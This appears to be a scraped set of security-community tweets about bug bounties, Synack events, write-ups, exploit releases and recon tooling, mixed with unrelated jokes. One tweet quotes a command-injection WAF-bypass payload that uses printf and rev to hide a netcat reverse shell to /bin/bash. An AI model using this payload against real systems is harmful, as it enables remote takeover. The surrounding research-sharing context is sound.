I am excited 🎉 to introduce findhunters. It is a platform to find bug hunters to collaborate! Check it out https://t.co/xxXOM6Gwx1 #BugBounty

Blacks in Cybersecurity is excited to announce our latest partnership with Synack, Inc. in their Synack Academy program for High School students! @synack Link: https://t.co/0ptNxbd3Lx #diversityandinclusion #blacksincyber #blackincyber #blacksincybersecurity #litlikebic

A command injection WAF bypass method discovered by Picus Labs researcher @evrnyalcin. It uses "rev" and "printf" commands in command substitution. Example: $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev) Read the write-up for details and mitigations:

Congratulations to the 2019-20 @SynackRedTeam #SRTOfTheYear - w-- - and to the @SynackRedTeam #RookieoftheYear - hughesey - For the official announcement, check out: https://t.co/C2blpt8QrD

ZyXel VMG3925-B10B Router FakeRoot Exploit (V5.13) https://t.co/8v75jGeWFP #0day #exploit #zyxel

Hi guys, I'm here to say goodbye. My wife says I'm addicted to Twitter and that it's ruining our relationship. We argued for a while and she told me to choose between her & Twitter. So I'll be logging off now while I pack her bags & call her a taxi. I'll be right back.

My niece is all set for Halloween. While her peers might be Elsa'ing it up, she marches to her own beat.

If you lzy lk me 1) https://t.co/lZaXVJ43ul 2) cat all_domains.txt | while read url; do curl -fsSL " https://t.co/JDAmqiBZuF" | sed 's/\"//g' | cut -f2 -d "," ; done 3) cd /opt/massdns; ./bin/massdns -r lists/resolvers.txt -t AAAA -w results.txt all_domains.txt -o S -w output.txt

So I am about 90 followers away from 10k... So decided to do a little give away when I hit the 10k mark. Anyone that shares this will be entered into a drawing, and I will give the winner (chosen randomly) a 1 year Burp Pro liscense. #bugbounty

MobSF V2.0 is released! New Dynamic Analyzer supports Android v4.1-9.0. Now you can perform instrumented security tests with ease. ZERO configuration, just run a Genymotion VM before Dynamic Analysis and that’s it. https://t.co/OnVOiTkJ9X #mobsf #AndroidSecurity #MobileSecurity

GitHub - A2nkF/macOS-Kernel-Exploit: macOS Kernel Exploit for CVE-????-???? (currently a 0day. I'll add the CVE# once it is published). Credit for the bug go to @LinusHenze :).

Here is the writeup:

#Hack4Levels! Thanks , @SynackRedTeam, @synack

Did a Write up of Vimeo SSRF , It was an interesting one. RT if you like it. https://t.co/dkHGGAup1y

I'm releasing all the slides (~800!) of my Mobile Security class: https://t.co/TAAnBMCBqB! They are not perfect, but students learned how to reverse apps, find&exploit real-world bugs, reason about threat modelling / system security, etc. Very proud of them :-) 👶 => 👨‍💻👩‍💻

Hear some tips and tricks from the Level 0x01 and 0x02 SRT competitors who came out on top for our Winter #Hack4Levels challenge. Thanks to @SecZiko, @200isOK, Nahidul, @ShawarkOFFICIAL, and @ilovebinbash for contributing to our blog! You can read it here:

HOW TO GET STARTED IN BUG BOUNTY (9+pro tips) https://t.co/FXv5JOeWax A week ago i asked the bounty community for their top 3 best tips on how to get started. This is the result. Thanks everyone who contributed and your awesome support! <3

Elhamdolleah Listed in Oracle Hall of fame after reporting a new 0- day exploit with CVSS Score 9.1, which allows unauthenticated remote attacker to execute malicious queries on the Server DB. New CVE has been added to the list: CVE-2019-2453 https://t.co/Jzm1tfhhpk #ZERO_DAY